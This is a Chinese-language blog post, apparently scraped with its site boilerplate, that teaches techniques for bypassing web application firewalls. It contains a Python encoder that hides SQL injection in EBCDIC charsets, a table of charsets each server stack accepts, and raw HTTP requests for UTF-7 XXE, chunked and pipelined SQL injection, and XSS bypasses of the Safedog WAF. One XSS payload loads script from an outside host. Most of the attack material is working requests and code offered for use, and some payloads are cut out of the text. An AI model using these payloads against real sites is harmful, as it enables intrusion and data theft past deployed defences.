import urllib def paramEncode(params="", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True): result = "" equalSign = "=" ampersand = "&" if encodeEqualSign: equalSign = equalSign.encode(charset) if encodeAmpersand: ampersand = ampersand.encode(charset) params_list = params.split("&") for param_pair in params_list: param, value = param_pair.split("=") if urldecodeInput: param = urllib.unquote(param).decode('utf8') value = urllib.unquote(value).decode('utf8') param = param.encode(charset) value = value.encode(charset) if urlencodeOutput: param = urllib.quote_plus(param) value = urllib.quote_plus(value) if result: result += ampersand result += param + equalSign + value return result # for IIS print paramEncode("input1='union all select * from users--") # prints %89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60  
编码后变成下面这段请求，可以成功进行bypass 
POST /sample.aspx?%89%95%97%A4%A3%F0=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 115 %89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60  
目标 Post(application/x-www-form-urlencoded) 【支持得编码格式，我们可以根据这些不常见得编码格式绕过各种waf】
Nginx，uWSGI-Django-Python3 IBM037，IBM500，cp875，IBM1026，IBM273
Nginx，uWSGI-Django-Python2 IBM037，IBM500，cp875，IBM1026，utf-16，utf-32，utf-32BE，IBM424
Apache-TOMCAT8-JVM1.8-JSP IBM037，IBM500，IBM870，cp875，IBM1026，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，utf-32，utf-32BE，IBM273，IBM277，IBM278，IBM280， IBM284，IBM285，IBM290，IBM297，IBM420，IBM424，IBM-Thai，IBM871，cp1025
Apache-TOMCAT7-JVM1.6-JSP IBM037，IBM500，IBM870，cp875，IBM1026，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，utf-32，utf-32BE，IBM273，IBM277，IBM278，IBM280， IBM284，IBM285，IBM297，IBM420，IBM424，IBM-Thai，IBM871，cp1025
Apache -PHP5（mod_php和FastCGI） None
IIS8-PHP7.1-FastCGI None
IIS6、7.5、8、10 -ASP经典 None
IIS6、7.5、8、10 -ASPX（v4.x） IBM037，IBM500，IBM870，cp875，IBM1026，IBM01047，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，unicodeFFFE，utf-32，utf-32BE，IBM273，IBM277， IBM278，IBM280，IBM284，IBM285，IBM290，IBM297，IBM420，IBM423，IBM424，x-EBCDIC-KoreanExtended，IBM-Thai，IBM871，IBM880，IBM905，IBM00924，cp1025 
 
编码绕过WAF 
在xxe攻击中，以下攻击被WAF拦截 
POST /bWAPP/xxe-2.php HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-type: text/xml; charset=UTF-8 Content-Length: 228 Connection: close Cookie: security_level=0; PHPSESSID=605bac73f50d32d09e96fd20a3df17e8   ]>  &test; login   
对关键payload进行utf-7编码，成功绕过 
POST /bWAPP/xxe-2.php HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-type: text/xml; charset=UTF-8 Content-Length: 228 Connection: close Cookie: security_level=0; PHPSESSID=605bac73f50d32d09e96fd20a3df17e8    &test; login   
 
Chunked 绕过WAF 
在进行测试时候发现下面这段请求被拦截,很明显带有注入特征 
POST /sample.aspx?input0=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41 input1='union all select * from users--  
在头部加入 Transfer-Encoding: chunked 之后，就代表这个报文采用了分块编码。这时，post请求报文中的数据部分需要改为用一系列分块来传输。每个分块包含十六进制的长度值和数据，长度值独占一行，长度不包括它结尾的，也不包括分块数据结尾的，且最后需要用0独占一行表示结束。 
POST /sample.aspx?input0=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 110 Transfer-Encoding: chunked 5; input 4; 1='u 5; nion 4; all 5; selec 4; t * 4; from 5; user 3; s-- 0  
 
pipline绕过WAF 
原始请求带有明显特征被拦截 
GET /sample.aspx?input0=something&input1='union+all+select+*+from+users-- HTTP/1.1 HOST: victim.com  
http协议是由tcp协议封装而来，当浏览器发起一个http请求时，浏览器先和服务器建立起连接tcp连接，然后发送http数据包，其中包含了一个Connection字段，一般值为close，apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大，超过一个http包容量，需要分多次发送时，值会变成keep-alive，即本次发起的http请求所建立的tcp连接不断开，直到所发送内容结束Connection为close为止。 下面请求包可能存在绕过： 
GET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive GET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive GET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive GET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive GET /sample.aspx?input0=something&input1='union+all+select+*+from+users-- HTTP/1.1 HOST: victim.com  
 
xss编码绕过WAF 
原始请求带有明显特征被拦截 
GET /192.168.3.108/Less-1/index.php?id= 
对关键payload进行unciode编码，成功绕过 
GET //192.168.3.108/Less-1/index.php?id=%3Cmarquee%20onstart=\u0070r\u06f\u006dpt()%3E HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive  
或者对关键payload进行url编码 
GET //192.168.3.108/Less-1/index.php?id= HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive  
marquee标签构造XSS站点 bypass 安全狗 
GET 192.168.3.108/Less-1/index.php?id=%3Cmarquee%20style=%22opacity:%200%22%20behavior=%22alternate%22%20onbounce=%22document.body.appendChild(document.createElement(%27scrip\x74%27)).src=`https://xss.com/1`%22%3E1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive  
img标签构造XSS站点 bypass 安全狗 
GET 192.168.3.108/Less-1/index.php?id= HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection:keep-alive 
                        
                        
本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！

                        
                        

                    

                    



                    

    收藏
    



                    
    
        
        标签：技术
        
    

    
        
                
            上一篇 >
            suricata6 bypass模式
        
                
            下一篇 >
            H3C AC：用户通过无线接入上网（PSK+Bypass方式）
        
                
    



                    
    
        
        
            相关文章
        
                
            Duilib中list控件支持ctrl和shif多行选中的实现
        
                
            [ICML2015]Batch Normalization:Accelerating Deep Network Training by Reducing Internal Covariate Shif
        
                
            win10系统 微软输入法 于eclipse ctrl+shif+f冲突间接处理办法
        
                
            Codeforces Round #259 (Div. 2) B. Little Pony and Sort by Shif
        
                
            读LDD3，内存映射与DMA--PAGE_SHIF…
        
                
            VMware虚拟机安装XP【要先分区，再设置BOOT 启动CD，shif+上移】
        
                
            更换iBus五笔的左与右Shif
        
                
            sublime ctrl+shif+f 没用解决办法
        
                
            idea 对 ctrl + z 的撤销 是 ctrl + shif + z
        
                
            计算机最早的设计师应用于,计算机应用基础选择题doc.doc
        
                
            win10自带截图神器：Win+Shift+S
        
                
            Python基础之文件目录操作
        
                
            python简述目录_Python基础之文件目录操作(示例代码)
        
                
            tp5 如何做数据采集
        
                
            任务2-7(服务器字体+阿里巴巴矢量库)
        
                
            html标签（1)：h1~h6,p,br,pre,hr
        
                
            TI 电量计介绍与芯片选型指南
        
                
            几款TI电源芯片简介
        
                
            TI DSP芯片C2000系列读取FLASH数据
        
                
            德州仪器(Ti)平台嵌入式开发基础
        
                
            TI三相电机智能栅极驱动芯片特点分类
        
                
            省选模拟（12.08） T3 圈圈圈圈圈圈圈圈
        
                
            Hadoop生态圈技术栈（上）
        
                
            大数据开发基础入门与项目实战（三）Hadoop核心及生态圈技术栈之6.Impala交互式查询
        
                
            小猿圈之Linux下Mysql 操作命令
        
                
            大数据Hadoop生态圈常用面试题
        
                
            大数据开发基础入门与项目实战（三）Hadoop核心及生态圈技术栈之4.Hive DDL、DQL和数据操作
        
                
            备战Noip2018模拟赛11（B组）T3 Monogatari 物语
        
                
            【智能优化算法-圆圈搜索算法】基于圆圈搜索算法Circle Search Algorithm求解单目标优化问题附matlab代码
        
                
            NYOJ 78 圈水池
        
                
            递归问题 跑道 汽车 绕圈问题 Python实现
        
                
            Hadoop生态圈（三）：MapReduce
        
                
    



                    
                
            
        

        
            


            

    
        内容推荐
    
    
                
            
                1
            
            
                大厂出品！保姆级教程帮你掌握「用户体验要素」
            
        
                
            
                2
            
            
                大厂实战案例！设计师如何助力京东快递业务增长？
            
        
                
            
                3
            
            
                总监干货！5个常见的UI设计规范创建误区
            
        
                
            
                4
            
            
                数据库管理利器——Navicat Premium v17.0.4学习版(Windows+MacOS+Linux)
            
        
                
            
                5
            
            
                进阶必学！快速掌握10种国际主流设计模型
            
        
                
            
                6
            
            
                春节期间，10个大厂的产品细节走心设计
            
        
                
            
                7
            
            
                如何帮助用户度过新人期？来看雪球APP的实战总结！
            
        
                
            
                8
            
            
                Sketch 95.3最新版下载 (Sketch矢量绘图应用软件)
            
        
                
            
                9
            
            
                Axure RP 9 最新正式版安装软件与汉化语言包下载(2023年3月30日更新)
            
        
                
            
                10
            
            
                嘘！SaaS产品的差异化设计细节，一般人我不告诉他
            
        
            




    





    
    
        最新更新
    
    
        
                        
                [产品经理]
                3分钟绘制流程图！这个AI+绘图工具的神仙组合，学完老板直呼内行
            
                        
                [产品经理]
                商业潜规则：打败你的不是AI，而是人性
            
                        
                [产品设计]
                DeepSeek+智能派单系统的实践分享
            
                        
                [产品经理]
                一文读懂本年实际损益借(贷)方发生额
            
                        
                [创业学院]
                大客户 vs 中小企业：需求竟天差地别？以企业培训数字化为例
            
                        
                [产品经理]
                不要将员工的“猴子”背到自己身上：职场管理中的权责划分
            
                        
                [产品经理]
                人工智能的三层架构：从应用层到基础服务层，解密智能革命
            
                        
                [产品设计]
                一文讲清楚iOS的SKAN4.0
            
                    
    
    



    
        热门标签
    
    
        
                         数量
                         AI技术趋势
                         用户角色
                         心智游移
                         自然生态系统
                         会员权益
                         AirDrop
                         hashmap
                         小龙虾
                         焦虑
                         危机处理
                         发展
                         微信群折叠
                         toast
                         测评新算法
                         改版
                         wireshark
                         投放方式
                         音频播放动效
                         timer
                         女性商业
                         古典自媒体
                         海外博主
                         repeater
                         转账
                         万能钥匙
                         秋招
                         快服务
                         个人演讲
                         客户共识
                    
    



        
    





    
        
            
                
                    
                        
                    
                    
                        Copyright © 2025 All rights reserved. 超级产品经理                        浙ICP备14026978号-4
                    
                        关于网站
                        联系我们
                    
                    

                
            
        
    



    

        
        
        立即
投稿
    
    
    
        
        
            
                
                
                
                
            
        
    

        
        
        
            
            微信公众账号
            微信扫一扫加关注
        
    
    
    
        
        返回
顶部

原始请求	插件改变后
X-Originating-IP：原始IP	X-Originating-IP：127.0.0.1
X-Forwarded-For：原始IP	X-Forwarded-For：127.0.0.1
X-Remote-IP：原始IP	X-Remote-IP：127.0.0.1
X-Remote-Addr：原始IP	X-Remote-Addr：127.0.0.1

原始请求	结果
Content-Type：原始	Content-Type：原始
Content-Type：原始	删除Content-Type
Content-Type：原始	Content-Type: invalid
Content-Type：原始	Content-Type: example
Content-Type：原始	Content-Type: multipart/
Content-Type：原始	Content-Type: multipart/digest
Content-Type：原始	Content-Type: multipart/digest; boundary=0000
Content-Type：原始	Content-Type: multipart/; boundary=0000

目标	Post(application/x-www-form-urlencoded) 【支持得编码格式，我们可以根据这些不常见得编码格式绕过各种waf】
Nginx，uWSGI-Django-Python3	IBM037，IBM500，cp875，IBM1026，IBM273
Nginx，uWSGI-Django-Python2	IBM037，IBM500，cp875，IBM1026，utf-16，utf-32，utf-32BE，IBM424
Apache-TOMCAT8-JVM1.8-JSP	IBM037，IBM500，IBM870，cp875，IBM1026，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，utf-32，utf-32BE，IBM273，IBM277，IBM278，IBM280， IBM284，IBM285，IBM290，IBM297，IBM420，IBM424，IBM-Thai，IBM871，cp1025
Apache-TOMCAT7-JVM1.6-JSP	IBM037，IBM500，IBM870，cp875，IBM1026，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，utf-32，utf-32BE，IBM273，IBM277，IBM278，IBM280， IBM284，IBM285，IBM297，IBM420，IBM424，IBM-Thai，IBM871，cp1025
Apache -PHP5（mod_php和FastCGI）	None
IIS8-PHP7.1-FastCGI	None
IIS6、7.5、8、10 -ASP经典	None
IIS6、7.5、8、10 -ASPX（v4.x）	IBM037，IBM500，IBM870，cp875，IBM1026，IBM01047，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，unicodeFFFE，utf-32，utf-32BE，IBM273，IBM277， IBM278，IBM280，IBM284，IBM285，IBM290，IBM297，IBM420，IBM423，IBM424，x-EBCDIC-KoreanExtended，IBM-Thai，IBM871，IBM880，IBM905，IBM00924，cp1025